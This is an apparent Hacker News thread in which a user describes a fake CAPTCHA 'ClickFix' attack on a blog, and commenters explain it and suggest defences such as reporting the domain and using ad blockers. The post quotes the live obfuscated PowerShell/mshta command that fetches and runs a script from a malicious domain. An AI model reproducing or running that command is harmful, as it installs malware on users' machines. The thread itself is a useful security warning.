frontpage.
newsnewestaskshowjobs

Open Source @Github

fp.

Open in hackernews

Ask HN: Crooked Timber showed showed me a virus captcha, What now?

21•Jgoauh•50m ago
Hello everyone, This morning, as i started my shift, i thought i would start visiting some news blogs / websites to kick off the day. When it got to Crooked Timber i saw a captcha page instead, it looked like a traditional Google captcha. I clicked it, the spinner spun, and a box opened on the right, showing the traditional "Verify you're human" white title on a blue background.

It showed 2 "Manual Verification Steps" : 1. Press Win + R 2. Press Ctrl + V and press Run

At first i assumed it was a new type of captcha checking i a physical keyboard was attached to the browser. But i instantly recognized the attempt to make me run a script on my machine.

I opened a new type and to my surprise, the something new was in my clipboard : "pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi""

I submited it to one of LLMs my work gives me access to, which told me to absolutly not run it (i wasn't planning to) and explained the command would download and run a script from the URL.

How do i protect myself from these scams / hack attempts in the future ? i always tought of myself "prepared" but i was surprised.

Has this happened to you before ? How do you protect yourself ?

Comments

baggachipz•37m ago
> showed showed
ABoltzmannMush•35m ago
Reporting to https://safebrowsing.google.com/safebrowsing/report_phish/, which if their tests reproduce the problem will make most browsers unwilling to load the domain. Generally ether caused by a hacked CMS or bad advertisement.
goodmythical•13m ago
VT says no bueno: https://www.virustotal.com/gui/url/4812564b97c63e1607e9182d0...
everdrive•33m ago
This is called a "ClickFix" attack. There is really _never_ a time when a CAPTCHA will require you to execute code on your machine.

The attack is basically getting someone to accidentally run malicious code.

- ctrl + R brings up the Windows "run" dialogue.

- the code executes a powershell command that reaches out to a remote server

- if successful, the remote server answers and you have installed a dropper or something.

Really, you should never do _anything_ like this for any website. You don't need to protect yourself. This is sort of equivalent (in the strict metaphorical sense) of getting a call from your bank and they ask you for your banking password: you just never do it, no matter what. Same thing here. You don't ever execute code via the run dialogue to solve a CAPTHCA. Never.

https://www.sentinelone.com/blog/how-clickfix-is-weaponizing...

nubinetwork•2m ago
$dayjob just sent out a corporate wide email saying the same thing... I guess it's starting to go around... it's been a while since I've seen a fake website telling people to eg. disable UAC.
sharedptr•31m ago
It’s a typical technique, report it to safe browsing, upload it to VirusTotal, that should be tit flagged quickly
bschne•30m ago
pinged one of the authors on bsky, let's see
joombaga•16m ago
fine-work-team.com has been reported as suspicious. Cloudflare is blocking it now.
kstrauser•13m ago
Not directly answering your questions, but I just wanted to say: Great instincts!

You saw something unusual, then

1. Stopped what you were doing.

2. Investigated to see if this was legitimate or malicious.

3. Identified a place to asked others about it.

4. Formulated a good question with enough background information to help people answer it.

All around good job! Well done.

SoftTalker•10m ago
> How do i protect myself from these scams / hack attempts in the future

Endless vigilance. Scammers are always working on new tricks. You were rightly suspicious and not fooled by this one.

Good4boothee•9m ago
> How do you protect yourself

Was the site itself actually infected(hacked)? If not, then all you need is adblock (like ublock origin). And that was true for last 20 years.

If website actually got hacked then I don't know of any good solutions. It will be flagged soon or later, and new visitors will be blocked by "Google Safe Browsing". Using something like "Qubes OS" might protect you against attacks based on browser zero-days but VMs don't really protect against ClickFix when people usually share clipboard between host and client VMs.

c0n5pir4cy•4m ago
Do you have any browser extensions enabled?

I've seen similar before where it wasn't the page itself that injected it - rather it was injected by a compromised/sold extension that has permissions on all pages.

Making KIO copy many files fast

https://blogs.kde.org/2026/07/28/making-kio-copy-many-files-fast/
1•signa11•11s ago•0 comments

Kaney's Weird Files – July 2026 Edition

https://kaneysweirdfiles.substack.com/p/july-2026-a-mutant-coon-a-book-review
1•experiencertim•1m ago•0 comments

Show HN: Higgs, a local AI CLI for Proton Mail (no cloud, no telemetry)

https://github.com/higgscli/higgs
1•cyberflux•1m ago•0 comments

TaskLoco reveals unprecedented productivity secret- Sticky Notes on a Storyboard

https://www.taskloco.com/
1•taskloco_nyc•2m ago•0 comments

Cacheinvalidate.com Was Still Available

https://cacheinvalidate.com
1•promptfluid•2m ago•0 comments

Sorry, the Data Says Communist

https://postcapitalistrobots.substack.com/p/sorry-the-data-says-communist
1•alejodosr•3m ago•1 comments

Show HN: Repo Autopsy – Transparent heuristics for repository install friction

https://repo-autopsy.zdfb20650.workers.dev
1•echoscarrie•3m ago•0 comments

Software Verification in the Age of Artificial Intelligence

https://learning.acm.org/techtalks/softwareai
1•rbanffy•4m ago•0 comments

Astronomers find strongest evidence yet that Betelgeuse has a companion

https://www.eso.org/public/news/eso2611/
1•Ralfp•6m ago•0 comments

Automation Led to Economic Misery. AI Doesn't Have To

https://www.theatlantic.com/ideas/2026/07/ai-automation-productivity-workers/688083/
1•01-_-•6m ago•0 comments

Load Bearing Memory: The Bones Remember

https://ikeanalytics.com/articles/what-the-bone-remembers/
1•hnscum•6m ago•1 comments

Why Hardware Engineering is the next target for Agents

https://assistedeverything.substack.com/p/the-age-of-agentic-engineering-for-hardware
1•gimili•6m ago•0 comments

Questions and answers on AI and verification: follow-up to my May ACM Tech Talk

https://bertrandmeyer.com/2026/07/21/questions-and-answers-on-ai-and-verification-a-follow-up-to-...
1•rbanffy•7m ago•0 comments

Who Owns the Cameras Watching You? (Hint: Not the Government)

https://comuniq.xyz/post?t=1452
1•01-_-•7m ago•0 comments

Local Inference – Run LLMs on Your Own Hardware (Guide and Forum)

https://localinference.io/
1•onion92•9m ago•0 comments

The Great Canadian Story of Canola

https://canadianfoodfocus.org/farming/the-great-canadian-story-of-canola/
1•thunderbong•9m ago•0 comments

Cracking Windows Open: Porting RADV to Win32

https://www.collabora.com/news-and-blog/news-and-events/cracking-windows-open-porting-radv-to-win...
1•losgehts•9m ago•0 comments

Glyphs 4 – the leading Mac font editor

https://glyphsapp.com
2•microflash•9m ago•0 comments

Show HN: Permanym – for hiring teams overwhelmed by AI resume spam

https://permanym.com
1•romanhn•10m ago•1 comments

Modernization Done Right: “Iphigenia” (1977) by Michael Cacoyannis

https://www.automachination.com/modernization-done-right-iphigenia-1977-michael-cacoyannis/
1•oliculipolicula•10m ago•0 comments

PostgreSQL's MVCC is bad. So is everyone else's

https://boringsql.com/posts/mvcc-bad-bad/
2•radimm•10m ago•0 comments

Show HN: Npx redential scan – evidence of your NDA work, nothing uploaded

https://github.com/redential/redential-cli
1•Jperalbelmont•11m ago•0 comments

ORMs Are Killing Your Performance

https://twitter.com/ClassicGamerTWR/status/2081569928490963022
1•luispa•11m ago•0 comments

Discernment: Fact-check an AI teaching you something you don't understand?

https://pluralistic.net/2026/07/28/hitl-ers/
1•hn_acker•12m ago•1 comments

Kimi in Chrome

https://github.com/0xSufi/kimi-chrome
2•binyu•12m ago•0 comments

DeepSeek V4 Flash, up to 32 tok/s on AMD Ryzen AI MAX+ 395

https://www.lucebox.com/blog/deepseek-v4-strix-halo
2•GreenGames•13m ago•0 comments

Well, Why Not?

https://rhollick.wordpress.com/2026/07/27/well-why-not/
1•speckx•13m ago•0 comments

Research: Why Some Junior Employees Work Well with AI–and Others Don't

https://hbr.org/2026/07/research-why-some-junior-employees-work-well-with-ai-and-others-dont
1•Anon84•14m ago•0 comments

Ask HN: How do you audit your app for compliance?

1•Luxter•14m ago•0 comments

GAO Finds Federal Cyber Reporting Requirements Largely Duplicative

https://www.gao.gov/products/gao-26-108606
2•toomuchtodo•15m ago•1 comments